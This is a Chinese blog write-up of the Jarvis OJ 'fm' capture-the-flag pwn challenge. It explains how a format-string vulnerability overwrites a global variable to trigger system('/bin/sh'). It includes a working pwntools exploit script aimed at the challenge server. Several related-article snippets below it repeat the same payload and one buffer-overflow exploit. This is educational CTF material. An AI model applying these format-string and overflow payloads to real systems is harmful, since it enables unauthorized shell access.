(Jarvis Oj)(Pwn) fm

最新推荐文章于 2022-10-30 22:41:19 发布
最新推荐文章于 2022-10-30 22:41:19 发布
阅读量1.3k 收藏 2
点赞数 2
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/github_36788573/article/details/80723670
版权

(Jarvis Oj)(Pwn) fm

查看保护。
这里写图片描述
ida查看程序逻辑。
这里写图片描述
第12行,很明显的格式化字符串漏洞,当全局变量x的值是4的时候会执行system函数,查看x的值。
这里写图片描述
x的值是3。所以就要利用格式化字符串漏洞的任意地址读写,“x_addr%[i]$n”,%n可以将已经输出的字符个数写入到指定的参数中,这个格式化字符串会在栈上的某处,需要定位x_addr作为printf的第几个参数来确定[i]的值,由于x_addr在32位程序中刚好是4个字节,所以这个格式化字符串刚好能把相应参数变为4。通过gdb确定位置。
这里写图片描述
这里写图片描述
可以看到0x41414141就是的位置,数一下就可以得到是第11个参数,尝试一下。
这里写图片描述
这里写图片描述
确实是11个参数。于是可以把AAAA替换为x的地址,p换成n就可以把x写成4,写得脚本。

  1 from pwn import *
  2 
  3 #conn=process('./fm')
  4 conn=remote('pwn2.jarvisoj.com','9895')
  5 e=ELF('./fm')
  6 x_addr=0x0804A02C                                      
  7 payload=p32(x_addr)+"%11$n"
  8 conn.sendline(payload)
  9 conn.interactive()
JarvisOJ——病毒数据分析
40KO的博客
03-07 496
0x00前言 这是一道恶意代码分析的题目,其实特征不太像病毒啦。。。整个流程分析下来,还是有不少收获,虽然最后卡在了某个点,但程序的所有功能和流程都分析完成了(因为不复杂,T__T)。在这里,我就把它当作真正的恶意程序来分析一番。 0x01信息收集 一开始我们没有必要直接去逆向这个程序,而是先收集相关信息,这样能够更轻松的完成逆向分析的步骤。 0.首先将它丢进沙箱 可以看到给出的评估...
BUUCTF:jarvisoj_fm(write up)
qq_44768749的博客
08-24 513
BUUCTF:jarvisoj_fm0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 开启了栈不可执行、canary以及部分RELRO保护 0x02 运行 运行未发现什么异常,但感觉应该会是格式化字符串漏洞 0x03 IDA 程序比较简单,关键部分都在主函数中,有getshell的函数,当x=4才执行system("/bin/sh") 存在格式化字符串漏洞 0x04 思路 x的值默认为3,需要利用格式化字符串漏洞改写x的值 测试格式
Jarvis Oj Pwn 学习笔记-fm
baoan4763的博客
06-11 200
格式化串漏洞(32bit): 链接领走: https://files.cnblogs.com/files/Magpie/fm.rar nc pwn2.jarvisoj.com 9895 首先验身: 看到某种奇怪的鸟类不禁慌了一哈...... 好,现在丢IDA: 先是看到了这样一个妩媚妖艳的东西...她被调用在main函数: 跟进去: 没看懂....(或许...
JarvisOJ fm
PLpa的博客
07-09 1204
这一题是一道格式化字符串漏洞题 关于格式化漏洞的基础,你可以看我前面的博客,里面有提到:https://blog.youkuaiyun.com/qq_43986365/article/details/94896862 拿到这一题,我们仍然是先查看保护: 我们可以看到,简单的格式化漏洞题只开了NX和CANARY保护,好的。 接下来我们就可以进入IDA中看一下程序的具体逻辑: 在这里,我们可以看到有一个明显的...
JarvisOJ PWN fm wp
苗_的博客
01-24 389
fm 拿到之后首先ida一下,看一下主函数,找漏洞点: 然后就发现第10行是一个很简单的格式化字符串漏洞,看一下x的内存地址: x的值是3,所以要利用格式化字符串漏洞的任意地址读写,“x_addr%[i]$n”,%n可以将已经输出的字符个数写入到指定的参数中,这个格式化字符串会在栈上的某处,需要定位x_addr作为printf的第几个参数来确定[i]的值,由于x_addr在32位程序...
【CTF】jarvisoj_fm 1
凉水的博客
07-06 628
jarvisoj_fm
BUUCTF jarvisoj exp整合
菜的只能随便写写博客
02-24 643
0x01 jarvisoj_level0  简单的地址改写 from pwn import * p = remote('node3.buuoj.cn', 26882) #p = process('./level0') shell_addr = 0x0000000000400596 p.sendline('a'*0x88+p64(shell_addr)) p.interactive()  ...
pwn格式化字符串漏洞小结
PLpa的博客
11-30 2695
格式化字符串漏洞 0x00.前言 在pwn中,格式化字符串漏洞是一个非常基础的漏洞,他通常穿插在各种漏洞之中。比如,当程序开了PIE保护时,在栈溢出之前,我们先可以运用格式化字符串漏洞获取栈中的信息;通过格式化字符串漏洞的任意地址写,我们可以把栈帧劫持到堆地址上;我们甚至可以直接通过任意地址写,劫持got表,实现getshell…… 总而言之,格式化字符串漏洞虽然在目前市面上的软件中比较难以看到,...
CTF比赛PWN题sgtlibc通用快速解题框架
serfend's blog
07-07 1819
开源地址:https://github.com/serfend/sgtlibc使用 安装pwn解题框架例题:buuctf start system_bss_binsh_direct_x64 shellcode_orw_x86 例题:buuctf pwnable_orw libc-leak_x86_puts 例题:ctfshow ret2libc_64 内部赛_签到题 libc-leak_x86_write_pure 例题:buuctf jarvisoj_level1 libc-leak_x86_writ
2021-08-30 BUUCTF刷题记录PWN
m0_56897090的博客
08-30 649
2021-08-30 BUUCTF刷题记录 刷题数量:13 题目分类:栈溢出、堆、pwn基础 文章目录2021-08-30 BUUCTF刷题记录[Black Watch 入群题]PWN0x00 题目描述0x01 分析思路0x02 EXPez_pz_hackover_20160x00 题目描述0x01 题目分析0x02 思路0x03 EXPjarvisoj_tell_me_something0x00 题目描述0x01 题目分析0x02 EXPJarvisoj_level30x00 题目描述0x01 题目思路0
Jarvis OJ
kof2019的博客
08-05 483
Jarvis OJ - 软件密码破解-1 -Writeup 转载请标明出处http://www.cnblogs.com/WangAoBo/p/7243801.html 记录这道题主要是想记录一下动态调试的过程 题目: 分析: 刚开始拿到这道题目还是想用IDA静态分析,但无奈函数太多找不到关键函数,看别人Writeup也只是说关键函数为sub_401BB0但不知道怎么找
jarvis OJ
CHOOOU的博客
11-05 980
basic Baby’s Crack 程序大概就是打开一个命令行输入的 file,然后打开一个 tmp,对 file 加密写入 tmp,将 file 删除,将 tmp 重命名为 file。 直接在 ida 中 F5,关键的代码就是: while (feof(*(_QWORD *)&argc, argv, v8, v16) == 0)
jarvisoj_fm
m0_52231248的博客
11-15 501
jarvisoj_fm Checksec: Ida: 很明显的格式化字符串漏洞并且我们将x修改为4程序就会给我们调用system函数 偏移gdb .%p都能确定,利用方式%$n,pwntools的fmstr模块都行可以看我之前写的pwn5 的wp有详细说 Exp: Flag: ...
jarvis oj fm writeup
ditto的博客
01-05 376
格式化字符串漏洞简单利用 32位程序。 canary和nx都打开了。 放ida里: 直接打印的buf,很明显的格式化字符串漏洞。 用%n,将其修改为4即可,exp如下: from pwn import* a=remote("pwn2.jarvisoj.com","9895") payload=p32(0x0804A02C)+"%11$n" a.sendline(payload) a....
BUUCTF-jarvisoj_fm1-WP
Rt1Text的博客
10-30 343
有canary ,题目提升fm,考虑格式化字符串。
Javisoj--PWN--fm
Jason_ZhouYetao的博客
12-09 1105
首先IDA看一波: 看到这里就可以很清楚的知道这个肯定是一个格式化字符串的题,因为这个涉及到了更改栈中的元素的值,第一眼看到这个X,你可能有点慌,因为你没有发现有关X的任何定义,不过没关系,没有任何定义就出现在IDA中的变量,他一定就是一个全局变量,在pseudocode界面直接双击x,发现界面发生了跳转: 这个可以直接看到x的地址:0x804A02C,这个在之后的格式化字符串中有着很...
jarvisoj_fm 1 格式化字符串漏洞
m0_49766582的博客
06-01 242
1 from pwn import * 2 p = remote("node3.buuoj.cn",29263) 3 payload = p32(0x0804A02C)+b"%11$n" 4 p.sendline(payload) 5 p.interactive() ~ 需要覆盖x的值,将x的值变为4,利用格式化字符串漏洞。
jarvis oj_用一种态度来构建Jarvis,生成式聊天机器人
weixin_26632369的博客
07-20 1257
jarvis ojCarsales.com, the company I work for, is holding a hackathon event. This is an annual event where everyone (tech or non tech) comes together to form a team and build anything — anything at al...
Jarvis OJ 【REVERSE】 Smali
qq_26779635的博客
12-01 1106
题目:都说学好Smali是学习Android逆向的基础,现在刚好有一个smali文件,大家一起分析一下吧~~ 链接:Crackme.smali.36e0f9d764bb17e86d3d0acd49786a18 之前接触过点smali,看下文件就是smali,本来想找smali转java工具,但看了下smali发现几个函数名能推出东西,如下 然后结合smali语法花点时间看了...
jarvisoj_fm 1
最新发布
03-26
### JarvisOJ FM 功能概述 JarvisOJ 是一个在线编程练习平台,旨在帮助用户提升其逆向工程技能。其中的 FM(File Management)模块主要用于文件管理操作,涉及二进制文件分析、调试以及反汇编等内容[^1]。 FM 的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值